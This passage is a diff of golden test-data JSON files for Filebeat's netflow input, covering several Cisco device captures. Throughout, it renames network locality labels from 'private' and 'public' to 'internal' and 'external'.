"192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -267,7 +267,7 @@ }, "flow": { "id": "Nle5z0FLBjA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -318,7 +318,7 @@ "source": { "bytes": 81, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56635 } }, @@ -332,7 +332,7 @@ "destination": { "bytes": 9075, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -348,7 +348,7 @@ }, "flow": { "id": "Nle5z0FLBjA", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -399,7 +399,7 @@ "source": { "bytes": 81, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56635 } }, 
@@ -413,7 +413,7 @@ "destination": { "bytes": 5536, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -429,7 +429,7 @@ }, "flow": { "id": "lfYzCmoZgqo", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -480,7 +480,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61773 } }, @@ -494,7 +494,7 @@ "destination": { "bytes": 5536, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -510,7 +510,7 @@ }, "flow": { "id": "lfYzCmoZgqo", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -561,7 +561,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61773 } }, @@ -574,7 +574,7 @@ "Fields": { "destination": { "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -590,7 +590,7 @@ }, "flow": { "id": "_9ahEyFsD94", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", @@ -640,7 +640,7 @@ }, "source": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56649 } }, @@ -654,7 +654,7 @@ "destination": { "bytes": 14179, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -670,7 +670,7 @@ }, "flow": { "id": "_9ahEyFsD94", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -721,7 +721,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56649 } }, @@ -735,7 +735,7 @@ "destination": { "bytes": 14179, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { 
@@ -751,7 +751,7 @@ }, "flow": { "id": "_9ahEyFsD94", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -802,7 +802,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56649 } }, @@ -815,7 +815,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -831,7 +831,7 @@ }, "flow": { "id": "bnG6S7DUlEE", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", @@ -881,7 +881,7 @@ }, "source": { "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61777 } }, @@ -895,7 +895,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -911,7 +911,7 @@ }, "flow": { "id": "bnG6S7DUlEE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -962,7 +962,7 @@ "source": { "bytes": 69, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61777 } }, @@ -976,7 +976,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -992,7 +992,7 @@ }, "flow": { "id": "bnG6S7DUlEE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1043,7 +1043,7 @@ "source": { "bytes": 69, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61777 } }, @@ -1056,7 +1056,7 @@ "Fields": { "destination": { "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1072,7 +1072,7 @@ }, "flow": { "id": "wuMbsS0oTj4", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", 
@@ -1122,7 +1122,7 @@ }, "source": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56650 } }, @@ -1136,7 +1136,7 @@ "destination": { "bytes": 881, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1152,7 +1152,7 @@ }, "flow": { "id": "wuMbsS0oTj4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1203,7 +1203,7 @@ "source": { "bytes": 75, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56650 } }, @@ -1217,7 +1217,7 @@ "destination": { "bytes": 881, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1233,7 +1233,7 @@ }, "flow": { "id": "wuMbsS0oTj4", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -1284,7 +1284,7 @@ "source": { "bytes": 75, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56650 } }, @@ -1297,7 +1297,7 @@ "Fields": { "destination": { "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1313,7 +1313,7 @@ }, "flow": { "id": "geQD5O-NWw8", - "locality": "private" + "locality": "internal" }, "netflow": { "asa_username": "", @@ -1363,7 +1363,7 @@ }, "source": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56651 } }, @@ -1377,7 +1377,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1393,7 +1393,7 @@ }, "flow": { "id": "geQD5O-NWw8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -1444,7 +1444,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56651 } }, 
@@ -1458,7 +1458,7 @@ "destination": { "bytes": 14178, "ip": "192.168.0.18", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1474,7 +1474,7 @@ }, "flow": { "id": "geQD5O-NWw8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.18", @@ -1525,7 +1525,7 @@ "source": { "bytes": 69, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 56651 } }, diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json index c586d597e751..135aa56d0d4e 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 17549 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "5JpExP8VeSU", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -76,7 +76,7 @@ "source": { "bytes": 56, "ip": "192.168.14.1", - "locality": "private", + "locality": "internal", "port": 0 } }, @@ -89,7 +89,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -105,7 +105,7 @@ }, "flow": { "id": "MSQgezzAYh0", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -158,7 +158,7 @@ "source": { "bytes": 56, "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 17549 } }, @@ -171,7 +171,7 @@ "Fields": { "destination": { "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 17549 }, "event": { @@ -187,7 +187,7 @@ }, "flow": { "id": "MSQgezzAYh0", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, 
@@ -240,7 +240,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -253,7 +253,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -269,7 +269,7 @@ }, "flow": { "id": "ioGVEAJtaEQ", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -322,7 +322,7 @@ "source": { "bytes": 56, "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 17805 } }, @@ -335,7 +335,7 @@ "Fields": { "destination": { "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 17805 }, "event": { @@ -351,7 +351,7 @@ }, "flow": { "id": "ioGVEAJtaEQ", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -404,7 +404,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -417,7 +417,7 @@ "Fields": { "destination": { "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -433,7 +433,7 @@ }, "flow": { "id": "0xqELVtMeog", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -486,7 +486,7 @@ "source": { "bytes": 56, "ip": "192.168.14.11", - "locality": "private", + "locality": "internal", "port": 17805 } }, @@ -499,7 +499,7 @@ "Fields": { "destination": { "ip": "192.168.14.11", - "locality": "private", + "locality": "internal", "port": 17805 }, "event": { @@ -515,7 +515,7 @@ }, "flow": { "id": "0xqELVtMeog", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -568,7 +568,7 @@ "source": { "bytes": 56, "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -581,7 +581,7 @@ "Fields": { "destination": { "ip": "192.168.14.1", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { 
@@ -597,7 +597,7 @@ }, "flow": { "id": "LA3WpK17LAw", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -650,7 +650,7 @@ "source": { "bytes": 56, "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 17805 } }, @@ -663,7 +663,7 @@ "Fields": { "destination": { "ip": "2.2.2.11", - "locality": "public", + "locality": "external", "port": 17805 }, "event": { @@ -679,7 +679,7 @@ }, "flow": { "id": "LA3WpK17LAw", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -732,7 +732,7 @@ "source": { "bytes": 56, "ip": "192.168.14.1", - "locality": "private", + "locality": "internal", "port": 0 } }, @@ -745,7 +745,7 @@ "Fields": { "destination": { "ip": "192.168.23.1", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -761,7 +761,7 @@ }, "flow": { "id": "tBFZO1WrQyk", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -814,7 +814,7 @@ "source": { "bytes": 160, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, @@ -827,7 +827,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -843,7 +843,7 @@ }, "flow": { "id": "oil2JqFPSyE", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -896,7 +896,7 @@ "source": { "bytes": 56, "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 18061 } }, @@ -909,7 +909,7 @@ "Fields": { "destination": { "ip": "192.168.23.22", - "locality": "private", + "locality": "internal", "port": 18061 }, "event": { @@ -925,7 +925,7 @@ }, "flow": { "id": "oil2JqFPSyE", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -978,7 +978,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, 
@@ -991,7 +991,7 @@ "Fields": { "destination": { "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 }, "event": { @@ -1007,7 +1007,7 @@ }, "flow": { "id": "Pbk_o-xetL4", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -1060,7 +1060,7 @@ "source": { "bytes": 56, "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 18061 } }, @@ -1073,7 +1073,7 @@ "Fields": { "destination": { "ip": "192.168.23.20", - "locality": "private", + "locality": "internal", "port": 18061 }, "event": { @@ -1089,7 +1089,7 @@ }, "flow": { "id": "Pbk_o-xetL4", - "locality": "public" + "locality": "external" }, "netflow": { "asa_fw_event": 2, @@ -1142,7 +1142,7 @@ "source": { "bytes": 56, "ip": "164.164.37.11", - "locality": "public", + "locality": "external", "port": 0 } }, diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json index 961f90791b37..9922cc10d661 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR-9000-series-template-260.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.31.81", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "kkhtKjgAywQ", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -80,7 +80,7 @@ "source": { "bytes": 40, "ip": "10.0.9.146", - "locality": "private", + "locality": "internal", "packets": 1, "port": 54017 } @@ -94,7 +94,7 @@ "Fields": { "destination": { "ip": "10.0.35.4", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { 
@@ -113,7 +113,7 @@ }, "flow": { "id": "4su7p2nlyno", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -167,7 +167,7 @@ "source": { "bytes": 104, "ip": "10.0.17.42", - "locality": "private", + "locality": "internal", "packets": 2, "port": 36484 } @@ -181,7 +181,7 @@ "Fields": { "destination": { "ip": "10.0.34.141", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -200,7 +200,7 @@ }, "flow": { "id": "mfb1_zWayo4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -254,7 +254,7 @@ "source": { "bytes": 52, "ip": "10.0.22.111", - "locality": "private", + "locality": "internal", "packets": 1, "port": 16814 } @@ -268,7 +268,7 @@ "Fields": { "destination": { "ip": "10.0.36.170", - "locality": "private", + "locality": "internal", "port": 64812 }, "event": { @@ -287,7 +287,7 @@ }, "flow": { "id": "jKhffDbQq0o", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64497, @@ -341,7 +341,7 @@ "source": { "bytes": 435, "ip": "10.0.23.59", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -355,7 +355,7 @@ "Fields": { "destination": { "ip": "10.0.20.242", - "locality": "private", + "locality": "internal", "port": 2013 }, "event": { @@ -374,7 +374,7 @@ }, "flow": { "id": "5siGD7iCzo4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65442, @@ -428,7 +428,7 @@ "source": { "bytes": 969, "ip": "10.0.34.71", - "locality": "private", + "locality": "internal", "packets": 1, "port": 443 } @@ -442,7 +442,7 @@ "Fields": { "destination": { "ip": "10.0.30.102", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -461,7 +461,7 @@ }, "flow": { "id": "IyuegsSri_U", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, 
@@ -515,7 +515,7 @@ "source": { "bytes": 104, "ip": "10.0.10.133", - "locality": "private", + "locality": "internal", "packets": 2, "port": 35273 } @@ -529,7 +529,7 @@ "Fields": { "destination": { "ip": "10.0.6.24", - "locality": "private", + "locality": "internal", "port": 56771 }, "event": { @@ -548,7 +548,7 @@ }, "flow": { "id": "9JGzjsOdNi4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65431, @@ -602,7 +602,7 @@ "source": { "bytes": 52, "ip": "10.0.37.29", - "locality": "private", + "locality": "internal", "packets": 1, "port": 80 } @@ -616,7 +616,7 @@ "Fields": { "destination": { "ip": "10.0.11.113", - "locality": "private", + "locality": "internal", "port": 56830 }, "event": { @@ -635,7 +635,7 @@ }, "flow": { "id": "Y3aiAEAjjys", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65432, @@ -689,7 +689,7 @@ "source": { "bytes": 614, "ip": "10.0.32.176", - "locality": "private", + "locality": "internal", "packets": 1, "port": 443 } @@ -703,7 +703,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 40078 }, "event": { @@ -722,7 +722,7 @@ }, "flow": { "id": "sC3kzwxISec", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, @@ -776,7 +776,7 @@ "source": { "bytes": 4350, "ip": "10.0.12.21", - "locality": "private", + "locality": "internal", "packets": 3, "port": 443 } @@ -790,7 +790,7 @@ "Fields": { "destination": { "ip": "10.0.3.110", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -809,7 +809,7 @@ }, "flow": { "id": "dTmlxL48EoA", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 70, @@ -863,7 +863,7 @@ "source": { "bytes": 533, "ip": "10.0.4.212", - "locality": "private", + "locality": "internal", "packets": 2, "port": 50691 } 
@@ -877,7 +877,7 @@ "Fields": { "destination": { "ip": "10.0.1.136", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -896,7 +896,7 @@ }, "flow": { "id": "oMLDxCSgNuA", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -950,7 +950,7 @@ "source": { "bytes": 13660, "ip": "10.0.33.122", - "locality": "private", + "locality": "internal", "packets": 325, "port": 58814 } @@ -964,7 +964,7 @@ "Fields": { "destination": { "ip": "10.0.34.71", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -983,7 +983,7 @@ }, "flow": { "id": "5siGD7iCzo4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -1037,7 +1037,7 @@ "source": { "bytes": 89, "ip": "10.0.20.242", - "locality": "private", + "locality": "internal", "packets": 1, "port": 2013 } @@ -1051,7 +1051,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 51621 }, "event": { @@ -1070,7 +1070,7 @@ }, "flow": { "id": "-IcTJfcRi8w", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, @@ -1124,7 +1124,7 @@ "source": { "bytes": 833, "ip": "10.0.13.25", - "locality": "private", + "locality": "internal", "packets": 1, "port": 443 } @@ -1138,7 +1138,7 @@ "Fields": { "destination": { "ip": "10.0.2.18", - "locality": "private", + "locality": "internal", "port": 62464 }, "event": { @@ -1157,7 +1157,7 @@ }, "flow": { "id": "tyf0jfEIDwM", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65437, @@ -1211,7 +1211,7 @@ "source": { "bytes": 1625, "ip": "10.0.25.59", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } @@ -1225,7 +1225,7 @@ "Fields": { "destination": { "ip": "10.0.27.168", - "locality": "private", + "locality": "internal", "port": 465 }, "event": { 
@@ -1244,7 +1244,7 @@ }, "flow": { "id": "OYKOBQNKdF4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -1298,7 +1298,7 @@ "source": { "bytes": 142184, "ip": "10.0.7.73", - "locality": "private", + "locality": "internal", "packets": 97, "port": 60312 } @@ -1312,7 +1312,7 @@ "Fields": { "destination": { "ip": "10.0.27.169", - "locality": "private", + "locality": "internal", "port": 995 }, "event": { @@ -1331,7 +1331,7 @@ }, "flow": { "id": "fC6tFjsdK54", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64496, @@ -1385,7 +1385,7 @@ "source": { "bytes": 3016, "ip": "10.0.19.50", - "locality": "private", + "locality": "internal", "packets": 58, "port": 34452 } @@ -1399,7 +1399,7 @@ "Fields": { "destination": { "ip": "10.0.24.13", - "locality": "private", + "locality": "internal", "port": 49917 }, "event": { @@ -1418,7 +1418,7 @@ }, "flow": { "id": "Kk4bVU4hDRk", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1472,7 +1472,7 @@ "source": { "bytes": 31500, "ip": "10.0.28.150", - "locality": "private", + "locality": "internal", "packets": 21, "port": 443 } @@ -1486,7 +1486,7 @@ "Fields": { "destination": { "ip": "10.0.21.200", - "locality": "private", + "locality": "internal", "port": 50254 }, "event": { @@ -1505,7 +1505,7 @@ }, "flow": { "id": "_Fk2ywvptGE", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1559,7 +1559,7 @@ "source": { "bytes": 2919, "ip": "10.0.26.188", - "locality": "private", + "locality": "internal", "packets": 3, "port": 993 } @@ -1573,7 +1573,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 35983 }, "event": { @@ -1592,7 +1592,7 @@ }, "flow": { "id": "MrTF7IZhOrg", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, 
@@ -1646,7 +1646,7 @@ "source": { "bytes": 4514, "ip": "10.0.29.34", - "locality": "private", + "locality": "internal", "packets": 5, "port": 443 } @@ -1660,7 +1660,7 @@ "Fields": { "destination": { "ip": "10.0.5.224", - "locality": "private", + "locality": "internal", "port": 51671 }, "event": { @@ -1679,7 +1679,7 @@ }, "flow": { "id": "hUKUTbBVmIY", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 65431, @@ -1733,7 +1733,7 @@ "source": { "bytes": 326, "ip": "10.0.8.200", - "locality": "private", + "locality": "internal", "packets": 1, "port": 23128 } @@ -1747,7 +1747,7 @@ "Fields": { "destination": { "ip": "10.0.15.38", - "locality": "private", + "locality": "internal", "port": 52364 }, "event": { @@ -1766,7 +1766,7 @@ }, "flow": { "id": "IoEUbnBqGXE", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 64498, @@ -1820,7 +1820,7 @@ "source": { "bytes": 112, "ip": "10.0.29.46", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json index 7a3989121e3b..9049d5513041 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASR1001--X.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "port": 53218 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "_qSyv-Xe8IM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAFHg==", @@ -70,7 +70,7 @@ "source": { "bytes": 965, "ip": "10.111.111.242", - "locality": "private", + "locality": "internal", "packets": 7, "port": 52444 } 
@@ -84,7 +84,7 @@ "Fields": { "destination": { "ip": "10.100.105.85", - "locality": "private", + "locality": "internal", "port": 41746 }, "event": { @@ -100,7 +100,7 @@ }, "flow": { "id": "7s_4xBb69Y0", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -147,7 +147,7 @@ "source": { "bytes": 284, "ip": "10.10.4.29", - "locality": "private", + "locality": "internal", "packets": 1, "port": 161 } @@ -161,7 +161,7 @@ "Fields": { "destination": { "ip": "10.111.111.242", - "locality": "private", + "locality": "internal", "port": 52444 }, "event": { @@ -177,7 +177,7 @@ }, "flow": { "id": "_qSyv-Xe8IM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAFHg==", @@ -224,7 +224,7 @@ "source": { "bytes": 670, "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "packets": 6, "port": 53218 } @@ -238,7 +238,7 @@ "Fields": { "destination": { "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "port": 61440 }, "event": { @@ -254,7 +254,7 @@ }, "flow": { "id": "jk1T8-P2OHM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -301,7 +301,7 @@ "source": { "bytes": 80, "ip": "10.12.104.239", - "locality": "private", + "locality": "internal", "packets": 2, "port": 1720 } @@ -315,7 +315,7 @@ "Fields": { "destination": { "ip": "10.12.104.239", - "locality": "private", + "locality": "internal", "port": 1720 }, "event": { @@ -331,7 +331,7 @@ }, "flow": { "id": "jk1T8-P2OHM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -378,7 +378,7 @@ "source": { "bytes": 80, "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61440 } @@ -392,7 +392,7 @@ "Fields": { "destination": { "ip": "10.15.131.98", - "locality": "private", + "locality": "internal", "port": 64400 }, "event": { 
@@ -408,7 +408,7 @@ }, "flow": { "id": "6AEj_wlzQm4", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAANQ==", @@ -455,7 +455,7 @@ "source": { "bytes": 101, "ip": "10.100.101.45", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -469,7 +469,7 @@ "Fields": { "destination": { "ip": "10.12.105.23", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -485,7 +485,7 @@ }, "flow": { "id": "MtCuD-nvBTY", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAHFA==", @@ -532,7 +532,7 @@ "source": { "bytes": 1134, "ip": "10.100.101.43", - "locality": "private", + "locality": "internal", "packets": 14, "port": 0 } @@ -546,7 +546,7 @@ "Fields": { "destination": { "ip": "10.11.31.108", - "locality": "private", + "locality": "internal", "port": 51708 }, "event": { @@ -562,7 +562,7 @@ }, "flow": { "id": "8zAXung0YbA", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQACBg==", @@ -609,7 +609,7 @@ "source": { "bytes": 237, "ip": "31.13.71.7", - "locality": "public", + "locality": "external", "packets": 4, "port": 443 } @@ -623,7 +623,7 @@ "Fields": { "destination": { "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "port": 58842 }, "event": { @@ -639,7 +639,7 @@ }, "flow": { "id": "5LxKkXX5FfM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -686,7 +686,7 @@ "source": { "bytes": 91, "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "packets": 1, "port": 161 } @@ -700,7 +700,7 @@ "Fields": { "destination": { "ip": "172.217.11.5", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -716,7 +716,7 @@ }, "flow": { "id": "MnDMft-qZjs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQABzg==", 
@@ -763,7 +763,7 @@ "source": { "bytes": 41, "ip": "10.12.92.102", - "locality": "private", + "locality": "internal", "packets": 1, "port": 50766 } @@ -777,7 +777,7 @@ "Fields": { "destination": { "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "port": 161 }, "event": { @@ -793,7 +793,7 @@ }, "flow": { "id": "Ddy-Ii-ZDDI", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -840,7 +840,7 @@ "source": { "bytes": 111, "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "packets": 1, "port": 58843 } @@ -854,7 +854,7 @@ "Fields": { "destination": { "ip": "10.100.105.85", - "locality": "private", + "locality": "internal", "port": 41351 }, "event": { @@ -870,7 +870,7 @@ }, "flow": { "id": "Hiy-Ti0eVlY", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -917,7 +917,7 @@ "source": { "bytes": 1164, "ip": "10.10.4.234", - "locality": "private", + "locality": "internal", "packets": 4, "port": 161 } @@ -931,7 +931,7 @@ "Fields": { "destination": { "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "port": 61440 }, "event": { @@ -947,7 +947,7 @@ }, "flow": { "id": "7iMintjCsaw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -994,7 +994,7 @@ "source": { "bytes": 80, "ip": "10.12.106.83", - "locality": "private", + "locality": "internal", "packets": 2, "port": 1720 } @@ -1008,7 +1008,7 @@ "Fields": { "destination": { "ip": "10.12.92.102", - "locality": "private", + "locality": "internal", "port": 50766 }, "event": { @@ -1024,7 +1024,7 @@ }, "flow": { "id": "MnDMft-qZjs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "DQABzg==", @@ -1071,7 +1071,7 @@ "source": { "bytes": 52, "ip": "172.217.11.5", - "locality": "public", + "locality": "external", "packets": 1, "port": 443 } 
